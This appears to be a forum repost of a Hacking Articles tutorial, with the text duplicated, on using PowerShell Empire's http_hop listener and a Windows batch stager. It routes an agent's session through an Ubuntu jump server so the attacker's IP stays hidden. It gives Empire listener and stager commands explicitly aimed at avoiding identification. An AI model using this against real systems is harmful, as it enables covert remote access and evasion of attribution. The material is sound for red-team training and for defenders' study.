Salsedo88
Blockchain Security Consultant
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
400 XP
This is our fourth article in empire series, in this article we learn to use hop payload in PowerShell empire. Empire has an inbuilt listener named http_hop which allows us to redirect our traffic to one of our another active listener after getting an agent. Thus, the namehopas it hops the agent from one listener to another in order to redirect traffic.
Similar to Metasploit, the hop listener in empire uses a hop.php file. When you activate the hop listener, it will generate three PHP files that will redirect your existing listener. Place the said filesin your jump server (ubuntu) and then set up your stager in according to get the session through the mediator i.e. our hop listener.
In the followingimage, you can see our Kali’s IP. Now, we will try and take windows session via ubuntu using http_hop payload, in order to hide our own IP, i.e. basically, our http_hop payload will help us (attacker) to hide from the getting caught.
Here, in the followingimage, you can see our ubuntu’s IP too.
Now, let’s get started.First, we should have a simple http listener, for that type :
Now, start the http_hop listener by typing :
Here, we have given RedirectListener i.e. all the traffic from http listener will be directed tothe http_hoplistener.
Executing the above listener will create three files as you can see that in the image above. Transfer these files to /var/www/html location of yourUbuntuas shown in the image below :
Now, you can see in the image below we have activated two listeners :
Let’s start our stager by typing the following commands :
Once our bat file is executed in the target PC, we will have our session. Now, if you observe the IP through which we have obtained the session is ofUbuntuand not of windows but we have the access of aWindowsPC, similarly, in windows, it will show that the attacking machine is Ubuntu and not kali. Hence our http_hop is effective.
In conclusion, the major advantage ofthe http_hoplistener is that it helps an attacker from being identified as on the target PC, as the said listener hides the original IP.
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here
Similar to Metasploit, the hop listener in empire uses a hop.php file. When you activate the hop listener, it will generate three PHP files that will redirect your existing listener. Place the said filesin your jump server (ubuntu) and then set up your stager in according to get the session through the mediator i.e. our hop listener.
In the followingimage, you can see our Kali’s IP. Now, we will try and take windows session via ubuntu using http_hop payload, in order to hide our own IP, i.e. basically, our http_hop payload will help us (attacker) to hide from the getting caught.
Here, in the followingimage, you can see our ubuntu’s IP too.
Now, let’s get started.First, we should have a simple http listener, for that type :
Code:
uselistener http
executeNow, start the http_hop listener by typing :
Code:
uselistener http_hop
set RedirectListener http
set Host //192.168.1.111Here, we have given RedirectListener i.e. all the traffic from http listener will be directed tothe http_hoplistener.
Executing the above listener will create three files as you can see that in the image above. Transfer these files to /var/www/html location of yourUbuntuas shown in the image below :
Now, you can see in the image below we have activated two listeners :
Let’s start our stager by typing the following commands :
Code:
usestager windows/launcher_bat
set Listener http_hop
executeOnce our bat file is executed in the target PC, we will have our session. Now, if you observe the IP through which we have obtained the session is ofUbuntuand not of windows but we have the access of aWindowsPC, similarly, in windows, it will show that the attacking machine is Ubuntu and not kali. Hence our http_hop is effective.
In conclusion, the major advantage ofthe http_hoplistener is that it helps an attacker from being identified as on the target PC, as the said listener hides the original IP.
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here